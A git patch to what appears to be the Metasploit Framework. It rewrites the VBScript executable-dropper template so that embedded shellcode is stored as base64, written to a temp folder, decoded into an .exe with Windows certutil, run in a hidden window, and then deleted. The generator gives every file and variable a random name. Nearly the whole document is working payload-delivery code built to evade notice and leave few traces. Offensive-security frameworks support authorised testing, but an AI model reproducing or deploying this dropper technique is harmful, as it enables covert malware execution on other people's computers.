From c8c5549b194c0f2a83ba14ec39854b4f423c483e Mon Sep 17 00:00:00 2001
From: f7b053223a9e <e4a2b4b243ef@yahoo.co.jp>
Date: Tue, 1 Mar 2016 10:48:25 +0900
Subject: [PATCH] Send base64ed shellcode and decode with certutil

---
 data/templates/scripts/to_exe.vbs.template | 17 +++++++++--------
 lib/msf/util/exe.rb                        |  4 +++-
 2 files changed, 12 insertions(+), 9 deletions(-)

diff --git a/data/templates/scripts/to_exe.vbs.template b/data/templates/scripts/to_exe.vbs.template
index a6ee5f30bb..f82e9be964 100644
--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,26 +1,27 @@
 Function %{var_func}()
-	%{var_shellcode} = "%{hex_shellcode}"
+	%{var_shellcode} = "%{base64_shellcode}"
 
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
 	Dim %{var_stream}
 	Dim %{var_tempdir}
-	Dim %{var_tempexe}
+	Dim %{var_tempbase64}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
+	%{var_tempbase64} = %{var_basedir} & "\" & "%{base64_filename}"
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
-	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-	For i = 1 to Len(%{var_shellcode}) Step 2
-	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
-	Next
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempbase64}, true , false)
+	%{var_stream}.Write %{var_shellcode}
 	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
+	%{var_shell}.run "certutil -decode " & %{var_tempbase64} & " " & %{var_tempexe}, 0, true
 	%{var_shell}.run %{var_tempexe}, 0, true
-	%{var_obj}.DeleteFile(%{var_tempexe})
+    %{var_obj}.DeleteFile(%{var_tempexe})
+	%{var_obj}.DeleteFile(%{var_tempbase64})
 	%{var_obj}.DeleteFolder(%{var_basedir})
 End Function
 
-%{init}
+%{init}
\ No newline at end of file
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 4963d9f2ae..9f13e4a759 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1243,6 +1243,7 @@ require 'msf/core/exe/segment_appender'
 
     hash_sub = {}
     hash_sub[:exe_filename]  = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+    hash_sub[:base64_filename]  = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
     hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_fname]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_func]      = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -1251,9 +1252,10 @@ require 'msf/core/exe/segment_appender'
     hash_sub[:var_shell]     = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempdir]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_tempexe]   = Rex::Text.rand_text_alpha(rand(8)+8)
+    hash_sub[:var_tempbase64]   = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_basedir]   = Rex::Text.rand_text_alpha(rand(8)+8)
 
-    hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
+    hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
 
     hash_sub[:init] = ""